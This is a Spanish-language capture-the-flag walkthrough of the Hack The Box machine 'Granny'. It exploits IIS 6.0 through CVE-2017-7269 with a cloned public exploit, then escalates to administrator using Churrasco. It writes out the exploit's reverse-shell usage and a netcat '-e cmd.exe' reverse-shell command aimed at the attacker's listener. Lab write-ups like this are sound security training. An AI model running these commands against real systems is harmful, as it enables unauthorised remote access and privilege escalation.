🏳️Granny

Datos		Notas
Nombre de la máquina:	Granny
IP de la máquina:	10.10.10.15
Sistema simulado:	Windows Server 2003
Servicio vulnerado:	Microsoft-IIS 6.0
CVEs:	CVE 2017-7269

1. Enumeración y descubrimiento

Comenzamos el trabajo con la máquina Granny elaborando un escaneo de todos los puertos de la máquina mediante nmap como es habitual.

Como podemos ver está aparentemente solo funcionando el puerto 80. Vamos a acceder a la web para ver ¿Que está montado en la máquina?.

2. Explotación

Vemos que es un portal que está aparentemente bajo construcción montado en un Windows Server 2003. En este punto empezamos a buscar si la versión IIS 6.0 tiene alguna vulnerabilidad activa y encontramos que el CVE 2017-7269 puede ser una buena opción. Existen varios exploits que pueden ayudarnos a explotar este CVE pero en nuestro caso vamos a usar el desarrollado por g0rx y que podemos encontrar en su Github. Recuerdo que podeís usar Searchexploit o buscar por internet para encontrar otras alternativas. Nos vamos a copiar su directorio en el escritorio y comenzamos.

git clone https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269.git

El uso del exploit biene explicado dentro del mismo en el código, pero os lo dejaré explicado aquí. Basicamente ejecutaremos el archivo con python y usaremos la siguiente estructura para ejecutarlo:

python2 iis6webdav.py [TargetIP] [TargetPORT] [ReverseIP] [ReversePORT]

Al ejecutarlo ganaremos acceso a la máquina como el usuario Network Service

En este punto aprovecharemos para ejecutar systeminfo y obtener más información sobre la página.

3. Escalada de privilegios Root

En este punto utilizaremos el script de Python Windows Exploit Suggester para ver cual es el exploit que podemos utilizar para explotar la máquina. Descubrimos que el exploit Churrasco es el que podemos utilizar para explotar la máquina.

Al ejecutar el programa que se encuentra en el repositorio directamente yo he tenido muchos problemas, la respuesta que daba el sistema era "Program too big to fit in memory", como se muestra en la captura más abajo, esto lo he resuelto cuando descomprimido el archivo Churrasco.zip y he usado el churrasco.exe que venía en el zip. Sin duda ha sido un buen quebradero de cabeza ya que nadie ha reportado, que yo haya podido encontrar, el error.

Para ejecutarlo generaremos un servidor smb mediante el cual subiremos dos archivos a la máquina, un nc.exe y churrasco.exe .

En este punto deberemos de ejecutar el script churrasco indicando la dirección de neustro servicio Netcat a la escucha.

\churrasco.exe -d "C:\WINDOWS\Temp\nc.exe -e cmd.exe [IP] [PORT]"

En nuestra máquina deberemos estar escuchando a la IP seleccionada.

Ya como administradores podremos ver las flags del usuario Lakis y el usuario Root y dar por resuelto el reto.

Si te he ayudado sígueme y apóyame en Hack The Box